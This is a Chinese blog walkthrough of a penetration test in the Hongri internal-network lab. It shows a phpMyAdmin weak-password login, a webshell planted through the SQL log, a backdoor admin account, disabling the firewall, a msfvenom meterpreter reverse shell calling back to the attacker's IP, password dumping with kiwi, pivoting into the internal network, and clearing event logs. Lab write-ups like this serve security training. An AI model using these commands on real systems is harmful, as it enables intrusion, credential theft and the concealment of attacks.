【内网横向】红日靶场1

记一次内网渗透

红日靶场下载地址:漏洞详情

靶场地址分配:

模拟外网网段:192.168.174.0/24

模拟内网网段:192.168.52.0/24

攻击机:

kali:192.168.174.131

靶机:

域控服务器2008:192.168.52.138(内网)

域成员2003:192.168.52.141(内网)

Win7: 192.168.52.143(内网)

192.168.174.130(外网)

1.信息收集

使用nmap对192.168.174.130进行扫描

对目录进行扫描,发现phpmyadmin页面

2.GETSHELL

弱口令root/root登录界面

使用日志漏洞

开启日志功能,并设置日志路径

写入一句话木马,并用蚁剑链接

在后台建立新用户,并赋予管理员权限--权限维持

net user 账户 密码 /add
管理员权限,所有直接加
net localgroup administrators admin /add

3.后渗透

关闭防火墙

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

开启3389

run post/windows/manage/enable_rdp
rdesktop 192.168.174.130:3389

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4444 -f exe -o brian.exe

将木马上传到肉鸡

开启msfconsole并监听:

use exploit/multi/handler

设置tcp监听:

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.174.131

exploit

运行肉鸡上的木马

信息查看

 whoami                                                         # 查看当前用户名
 whoami /all                                                    # 获取域SID
 ipconfig /all                                                  # 网络配置文件
 route print                                                    # 打印路由信息
 arp -a                                                   # 查看arp缓存,可以发现内网主机
 systeminfo                                                     # 操作系统信息
 echo %PROCESSOR_ARCHITECTURE%                                  # 系统体系架构
 tasklist /v                                                    # 本机进程
 net statistics workstation                                     # 主机开机时间
 net user                                                        # 查看本地用户
 net localgroup administrators                        # 查看本地管理员组(通常包含域用户)
 net user xxx                                                    # 查看指定用户详细信息
​

进程迁移

ps migrate 512 # 默认是加载32位的系统,所以如果目标主机是64位系统的话,需要将进程迁移到一个64位程序的进程中 load kiwi # 加载kiwi模块 creds_all # 列举系统中的明文密码

权限提升

4.横向移动

配置静态路由(可以后台运行,使用永恒之蓝打域控)

run autoroute 192.168.52.0/24

使用代理(为了在msf之外访问内网,只好设计一个代理)

设置代理服务器

配置代理文件

vim /etc/proxychains.conf

对内网进行端口扫描

5.清理痕迹

meterperter清除日志功能: clearev #清除windows中的应用程序日志、系统日志、安全日志

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello_Brian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值